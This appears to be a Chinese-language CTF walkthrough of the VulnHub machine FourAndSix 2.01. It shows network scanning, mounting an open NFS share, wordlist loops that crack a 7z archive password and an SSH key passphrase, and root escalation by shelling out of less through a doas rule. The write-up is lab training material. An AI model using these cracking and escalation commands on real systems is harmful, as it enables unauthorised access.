OSCP - FourAndSix 2.01 的破解

本文主要记录对 FourAndSix 2.01 的渗透学习过程,测试的 VM 主机主要来源 www.vulnhub.com
博客集:面向 CTF 的 OSCP 破解系列
下载链接:FourAndSix 2.01

OSCP - FourAndSix 2.01 的破解


2019年4月13日19:19:03 【原创】

1. 官方描述

Name: FourAndSix: 2.01
名字:FourAndSix: 2.01
Date release: 28 Oct 2018
发布日期:2019-8-28
Description: Task is to become root and read /root/flag.txt.
描述:获取 root 权限并读取 /root/flag.txt 文件内容

2. Workthrough

开始不知道IP,使用 netdicover 进行IP发现

root@kali:~# netdiscover -r 10.10.10.0/24
 Currently scanning: Finished!   |   Screen View: Unique Hosts

 5 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 300
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 10.10.10.1      00:50:56:c0:00:08      2     120  VMware, Inc.
 10.10.10.2      00:50:56:fb:16:b2      1      60  VMware, Inc.
 10.10.10.76     00:0c:29:62:56:41      1      60  VMware, Inc.
 10.10.10.254    00:50:56:e0:63:df      1      60  VMware, Inc.

发现IP为 10.10.10.76 ,下面使用 nmap 进行端口探测
-Pn 使用无 ping扫描,疑问有的主机禁用了ICMP
-p- 全端口扫描,类似于 -p 1-65535

root@kali:~# nmap -Pn -p- 10.10.10.76
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-14 01:28 EDT
Nmap scan report for 10.10.10.76
Host is up (0.00054s latency).
Not shown: 65531 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
111/tcp  open  rpcbind
820/tcp  open  unknown
2049/tcp open  nfs
MAC Address: 00:0C:29:62:56:41 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 707.82 seconds

惊奇的发现开放了 nfs 服务。NSF代表网络文件系统协议。

# 可能需要安装 apt-get install nfs-common
root@kali:~# showmount -e 10.10.10.76
Export list for 10.10.10.76:
/home/user/storage (everyone)

发现有一个目录(/home/user/storage)是可以任一用户访问的,挂载到本机

root@kali:~# mount -t nfs 10.10.10.76:/home/user/storage ctf-nfs/
root@kali:~# cd ctf-nfs/
root@kali:~/ctf-nfs# ls
backup.7z
root@kali:~/ctf-nfs# 7z e backup.7z
Enter password (will not be echoed):
# 解压的过程中发现需要输入密码

下面就需要找到解压缩密码

# 方法一
root@kali:~/ctf-nfs# rarcrack --thread 4 --type 7z backup.7z

# 方法二:
路径:https://github.com/exexute/PythonScaffold/blob/PythonScaffold_0.1/enum_violence/file_enum/7z-crack.sh
root@kali:~/ctf-nfs# cat 7z-crack.sh
	while read line;do if 7z e $1 -p"$line" 1>/dev/null 2>/dev/null;then echo "FOUND PASSWORD:"$line;break;fi;done
	
root@kali:~/ctf-nfs# chmod 777 7z-crack.sh
root@kali:~/ctf-nfs# ./7z-crack.sh backup.7z /usr/share/wordlists/rockyou.txt

# 方法三
在线破解 https://www.lostmypass.com/

#方法四
路径  https://github.com/koboi137/john/7z2john.pl
root@kali:~/ctf-nfs# git clone https://github.com/koboi137/john
root@kali:~/ctf-nfs/john-master# ./7z2john.pl ../backup.7z > ../backup.7z.hash:/
root@kali:~/ctf-nfs/john-master# john -w:/usr/share/wordlists/rockyou.txt ../backup.7z.hash                                                                        

无论如何,最后得出的结果是 密码 chocolate

root@kali:~/ctf-nfs# 7z e backup.7z
root@kali:~/ctf-nfs#ssh-keygen -l -f id_rsa.pub
2048 SHA256:BPl29YrxUBdBmLaG6K58UGlR0wruEBQE8vGOtrbXl8Y user@fourandsix2 (RSA)

用于SSH访问的RSA密钥对。使用密钥登录,提示仍然需要密码。破解另一个密码

root@kali:~/ctf-nfs# ssh -i id_rsa [email protected]
# 破解另一个密码
root@kali:~/ctf-nfs# cat /usr/share/wordlists/rockyou.txt | while read pass; do if ssh-keygen –c –C "user@forandsix" –P $pass –f id_rsa &>/dev/null; then echo $pass; break; fi; done

密码为 12345678

root@kali:~/ctf-nfs# ssh -i id_rsa [email protected]
Enter passphrase for key 'id_rsa': 12345678
Last login: Mon Oct 29 13:53:51 2018 from 192.168.1.114

fourandsix2$ id
uid=1000(user) gid=1000(user) groups=1000(user), 0(wheel)

提权

fourandsix2$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/chfn
/usr/bin/chpass
/usr/bin/chsh
/usr/bin/doas
/usr/bin/lpr
/usr/bin/lprm
/usr/bin/passwd
/usr/bin/su
/usr/libexec/lockspool
/usr/libexec/ssh-keysign
/usr/sbin/authpf
/usr/sbin/authpf-noip
/usr/sbin/pppd
/usr/sbin/traceroute
/usr/sbin/traceroute6
/sbin/ping
/sbin/ping6
/sbin/shutdown
fourandsix2$

发现一个名为 /usr/bin/doas 的程序,通常此程序作用类似于 sudo,从这里下手

fourandsix2$ cat /etc/doas.conf
permit nopass keepenv user as root cmd /usr/bin/less args /var/log/authlog
permit nopass keepenv root as root

执行命令提权

fourandsix2$ doas /usr/bin/less /var/log/authlog

OSCP - FourAndSix 2.01 的破解_第1张图片
按 v 跳转到 vi 模式,之后输入 :!sh 跳转到一个全新的shell环境

在这里插入图片描述

获取到flag

fourandsix2# id
uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)
fourandsix2# cat /root/flag.txt
Nice you hacked all the passwords!

Not all tools worked well. But with some command magic...:
cat /usr/share/wordlists/rockyou.txt|while read line; do 7z e backup.7z -p"$line" -oout; if grep -iRl SSH; then echo $line; break;fi;done

cat /usr/share/wordlists/rockyou.txt|while read line; do if ssh-keygen -p -P "$line" -N password -f id_rsa; then echo $line; break;fi;done


Here is the flag:
acd043bc3103ed3dd02eee99d5b0ff42
fourandsix2#

你可能感兴趣的:(OSCP-CTF)